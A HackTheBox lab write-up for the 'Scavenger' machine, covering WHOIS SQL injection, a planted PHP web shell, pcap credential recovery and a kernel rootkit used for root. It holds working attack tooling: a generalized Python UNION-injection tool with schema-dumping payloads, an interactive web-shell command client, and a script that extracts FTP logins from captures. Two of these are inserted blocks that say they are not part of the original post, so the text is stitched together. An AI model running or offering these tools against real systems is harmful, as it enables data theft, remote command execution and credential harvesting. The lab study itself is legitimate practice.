HackTheBox — Scavenger

Yan1x0s
9 min read · Feb 29, 2020

Greetings folks,
This is going to be my write-up of Scavenger from HackTheBox.
If you notice that I misunderstood something, please let me know.

https://www.hackthebox.eu/home/machines/profile/202

About the box :

Scavenger is a hard-rated machine on HackTheBox. It is one of my favorite boxes.

To sum up, it starts with an SQL injection in the whois service which leaks new subdomains. One of them hosts a backdoored web service; from there we get access to the FTP service, do some forensics to get more users, and end up exploiting a rootkit to get root.
In short, it was a long road, but I learnt a lot.
If you are a sysadmin, I'm sure you will like this machine.

Ompamo, Thanks for this awesome box.

BTW, I didn't get a shell on this box…

Recon :

I first ran an initial nmap scan, saving the output to my nmap directory:

nmap -sV -sC -oA nmap/scavenger 10.10.10.155

The result is:

We have 6 ports open.
- 21/FTP: latest version of vsftpd
- 22/SSH: latest version of OpenSSH
- 25/SMTP: recent version of Exim smtpd
- 43/WHOIS: nmap couldn't get banner information for this service
- 53/DNS: recent version of ISC BIND
- 80/HTTP: latest version of the Apache web server

After seeing this, I felt like I was in the intranet of some company.

Initial foothold :

Of course, I picked the web service to start with:

An error page mentioning that a vhost is needed.
Let's jump straight to vhost discovery using gobuster:

Sadly, nothing found…
I went back to the web service and scanned for directories and files:

I won't waste my time here; let's go check another service.
I was unsure what to choose, so I looked at the open ports again: the WHOIS service is rarely seen, so I wanted to take a closer look at it.

We get no response, but there is a reference to supersechosting.htb.

At this point, either this is a waste of time because I get nothing, or the domains I'm requesting simply don't exist in their database!

What? Is it what I'm thinking?

It is indeed ❤
An SQL injection in the whois service.

Let's exploit it using a UNION query:

1- Find the number of columns selected by the original query, so that our UNION injection doesn't fail

So, it's not 1 column

Great, it's 2 and the first one is printed.

2- Get database name

3- Get tables

4- Get columns

5- Finally, get values

Cool! I added the new subdomains to my hosts file :D
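The five steps above, as an added example that is not part of the original write-up: a raw WHOIS client (RFC 3912: query, CRLF, read until close) plus the payload builder for the UNION technique. The target IP and port 43 come from the write-up; the quote-closing prefix `x' UNION SELECT … -- -`, the marker string and the MySQL-style information_schema queries are my assumptions, since the post does not show the exact payloads. It generalizes step 1 slightly by trying the marker in every column position, so it also learns which column the service echoes back.

```python
import socket

# From the write-up: the box and the WHOIS port. Everything else is assumed.
TARGET = "10.10.10.155"
WHOIS_PORT = 43


def whois_raw(query, host=TARGET, port=WHOIS_PORT, timeout=10):
    """Send one raw WHOIS request (the query followed by CRLF) and
    return the whole reply; the server closes the socket when done."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(query.encode() + b"\r\n")
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode(errors="replace")


def union_payload(n_cols, expr, echoed=0):
    """Close the original string literal, UNION in a row of n_cols values
    and place `expr` in the column the application prints (0-based).
    The "x'" prefix and "-- -" comment terminator are assumptions."""
    cols = ["NULL"] * n_cols
    cols[echoed] = expr
    return "x' UNION SELECT " + ",".join(cols) + "-- -"


def find_column_count(send, max_cols=10, marker="wh0isINJ"):
    """Step 1: grow the UNION row until the marker comes back. Trying the
    marker in every position also reveals which column is echoed.
    Returns (n_cols, echoed_index) or None."""
    for n in range(1, max_cols + 1):
        for pos in range(n):
            if marker in send(union_payload(n, f"'{marker}'", pos)):
                return n, pos
    return None


def enum_payloads(n_cols, echoed, table=None, columns=None):
    """Steps 2-5 as ready-to-send payloads. group_concat packs a whole
    result set into the single echoed column, which matters because the
    WHOIS front end only prints one row back (assumed MySQL dialect)."""
    exprs = {
        "database": "database()",
        "tables": "(SELECT group_concat(table_name) FROM information_schema.tables"
                  " WHERE table_schema=database())",
    }
    if table:
        exprs["columns"] = ("(SELECT group_concat(column_name) FROM information_schema.columns"
                            f" WHERE table_name='{table}')")
    if table and columns:
        exprs["values"] = (f"(SELECT group_concat(concat_ws(':',{','.join(columns)})"
                           f" SEPARATOR ' | ') FROM {table})")
    return {name: union_payload(n_cols, expr, echoed) for name, expr in exprs.items()}


if __name__ == "__main__":
    found = find_column_count(whois_raw)
    if found is None:
        raise SystemExit("no echoed column found; not a UNION-able injection?")
    n, pos = found
    print(f"[*] {n} columns, column {pos} is echoed")
    for step, payload in enum_payloads(n, pos).items():
        print(f"[{step}] {whois_raw(payload).strip()}")
```

Once `tables` gives you a table name, call `enum_payloads(n, pos, table=..., columns=[...])` again to get the `columns` and `values` payloads; each step reuses the same echoed column, exactly as in the write-up.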

Web shell backdoor :

First things first, let's dig deeper:

Sending an AXFR zone-transfer request with the dig command may reveal other subdomains:

Nothing here

Nothing…

Nothing… :(

Yay! We got sec03

Let's go back to the web server using the new vhosts.
The only one that worked was sec03; it was obvious anyway…

Some enumeration

We get redirected to the login page for every page we visit.

It's a bug tracker (Mantis).
I googled for the default credentials

We are in

First things first, let's see if there are known vulns for Mantis

Okay, we have some.
Now, let's find the version

Damn it! Forbidden access.
I found that Mantis has an API; I tried using it to bypass some restrictions and find valuable information.

I couldn't do anything with it, just browse what I could already read using the browser

There were a composer file and a readme file

Since I didn't have the version, I didn't want to try the vulns blindly..

I went, somewhat desperately, looking at the other services..

The vsftpd version we have is newer than this one.
Do we have anonymous access?

No….
What about the Exim (SMTP) service?

Wow, the version we have is 4.89
For the first one:

Authentication is required….
What about the second one?

We need a PHPMailer directory, but we don't have one…

The third one is just funny xD

For real ? xD

Nothing left…
Let's exploit the Mantis service blindly…

Failed

And failed too =(

I took a step back and re-checked my findings in CherryTree!

How the hell did I not see this!

Maybe I thought that someone else had exploited the web server and forgotten their shell there.
I reset the machine to confirm that the file is intended to be there.
And as expected, it's a web shell backdoor!!!

Let's find the parameter

The name of the parameter is hidden :D

I tried to get a reverse shell, but it didn't work…
Maybe an iptables rule is blocking us!
The ping worked

But no reverse shell!

I wrote this little script to make the RCE exploitation easier:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
import sys

URI = "http://sec03.rentahacker.htb/"
BACKDOOR = "shell.php"
URL = URI + BACKDOOR
PARAMETER = "hidden"  # the GET parameter the web shell reads its command from

while True:
    try:
        cmd = input("$ ").strip(" \t\n")
    except (EOFError, KeyboardInterrupt):
        sys.exit(0)
    if not cmd:
        continue
    # every request is a fresh, stateless execution on the target:
    # no cwd, env or privilege carries over from the previous command
    r = requests.get(URL, params={PARAMETER: cmd}, timeout=15)
    print(r.text)

So, we have 3 system users (ib01c0X), 1 web user (ib01www) and 1 FTP user (ib01ftp).

Getting user :

I struggled navigating the system. Then I remembered that there is an SMTP service.

Checking the mail directory

We get FTP creds :D

We have a note, a log file and a pcap file!
Let's investigate:

Finding the attacker's footprints:

1- I checked the pcap and found this:

It's the attacker using the web shell backdoor and running a file named root.c! What is it?

It's a kernel module; let's save this one for later.

2- Export the traffic to make the searching phase easier:

3- strings, and grep for "pass":

New creds found!
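The three forensics steps above, done in one place, as an added example that is not part of the original write-up: a minimal classic-pcap walker that carves TCP payloads straight from the capture (so the "export traffic, then strings | grep pass" step keeps who talked to whom), a grep over those payloads, and a USER/PASS pairer for FTP logins. The capture embedded below is constructed by the block itself from made-up frames (no checksums, fixed sequence numbers); the client address, the `hidden` parameter, the vhost name and the ib01c01 user echo the write-up, the password is a placeholder and not the real one.

```python
import re
import struct

PCAP_MAGIC_LE = 0xA1B2C3D4
LINKTYPE_ETHERNET = 1


def tcp_payloads(pcap):
    """Walk a classic (non-pcapng) pcap and return
    (src, sport, dst, dport, payload) for every TCP segment carrying data."""
    magic = struct.unpack("<I", pcap[:4])[0]
    if magic == PCAP_MAGIC_LE:
        end = "<"
    elif magic == 0xD4C3B2A1:
        end = ">"
    else:
        raise ValueError("not a classic pcap (pcapng is not handled here)")
    if struct.unpack(end + "I", pcap[20:24])[0] != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet link type is handled")
    off, out = 24, []
    while off + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack(end + "IIII", pcap[off:off + 16])
        off += 16
        frame = pcap[off:off + incl_len]
        off += incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":   # IPv4 only
            continue
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4
        if ip[9] != 6:                                        # TCP only
            continue
        total_len = struct.unpack("!H", ip[2:4])[0]
        src = ".".join(map(str, ip[12:16]))
        dst = ".".join(map(str, ip[16:20]))
        tcp = ip[ihl:total_len]
        if len(tcp) < 20:
            continue
        sport, dport = struct.unpack("!HH", tcp[:4])
        payload = tcp[(tcp[12] >> 4) * 4:]
        if payload:
            out.append((src, sport, dst, dport, payload))
    return out


def grep_payloads(payloads, pattern=rb"pass"):
    """The 'strings | grep -i pass' step, per line and per connection."""
    rx = re.compile(pattern, re.I)
    hits = []
    for src, sport, dst, dport, data in payloads:
        for line in data.splitlines():
            if rx.search(line):
                hits.append((f"{src}:{sport} -> {dst}:{dport}", line.decode(errors="replace")))
    return hits


def ftp_logins(payloads):
    """Pair FTP USER/PASS commands that belong to the same 4-tuple."""
    users, logins = {}, []
    for src, sport, dst, dport, data in payloads:
        key = (src, sport, dst, dport)
        for line in data.decode(errors="replace").splitlines():
            cmd, _, arg = line.partition(" ")
            if cmd.upper() == "USER":
                users[key] = arg
            elif cmd.upper() == "PASS" and key in users:
                logins.append((users[key], arg))
    return logins


def build_sample_pcap(segments):
    """Constructed test data: wrap raw TCP payloads in minimal
    Ethernet/IPv4/TCP headers. This is not real captured traffic."""
    out = [struct.pack("<IHHiIII", PCAP_MAGIC_LE, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)]
    for i, (src, sport, dst, dport, data) in enumerate(segments):
        tcp = struct.pack("!HHIIBBHHH", sport, dport, 1 + i, 1, 5 << 4, 0x18, 8192, 0, 0)
        ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(data), i, 0x4000,
                         64, 6, 0, bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
        frame = b"\x00" * 12 + b"\x08\x00" + ip + tcp + data
        out.append(struct.pack("<IIII", 1582934400 + i, 0, len(frame), len(frame)) + frame)
    return b"".join(out)


# Constructed sample: the backdoor call and an FTP login on one connection.
SAMPLE_PCAP = build_sample_pcap([
    ("10.10.14.5", 40001, "10.10.10.155", 80,
     b"GET /shell.php?hidden=id HTTP/1.1\r\nHost: sec03.rentahacker.htb\r\n\r\n"),
    ("10.10.14.5", 40002, "10.10.10.155", 21, b"USER ib01c01\r\n"),
    ("10.10.14.5", 40002, "10.10.10.155", 21, b"PASS Sample-Passw0rd!\r\n"),   # placeholder
])

if __name__ == "__main__":
    segs = tcp_payloads(SAMPLE_PCAP)
    for where, line in grep_payloads(segs):
        print(where, line)
    print("FTP logins:", ftp_logins(segs))
```

On the real capture, replace `SAMPLE_PCAP` with `open("file.pcap", "rb").read()`; if the file is pcapng rather than classic pcap, convert it first with editcap or tshark, since this walker deliberately handles only the classic format.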

I tried them everywhere:

They ended up being the FTP creds of ib01c01 =)

We got user ^_^

Getting root :

If my assumption is correct, the attacker used the web backdoor to install a rootkit and compromised the whole system.

I didn't have the knowledge to understand the root.c file in depth.
I googled it and found this amazing blog:
https://0x00sec.org/t/kernel-rootkits-getting-your-hands-dirty/1485
I really recommend you read it!

First we need to load the module

But where is the .ko file?
I spent some time looking for it and finally found it in the FTP home directory, hidden under the name "…"

The attacker used the same module as in the blog but changed one thing: the magic word.

In our case, I loaded the file in IDA:

We notice that the magic variable was g0tr00t in the blog, and here it was replaced by "g3tPr1v".

Time to upload the kernel module (wget), load it (insmod), give it the right permissions (chmod) and exploit it through the ttyR0 device.

What happened at first is that, after triggering the rootkit, the privileges were dropped right after the first command. I ended up chaining each command with the echo of the magic word, so that every command is executed as root.

Voila voila =D

I hope you learned something ^_^
Thanks for reading =)

Wiw,

#Yan1x0s
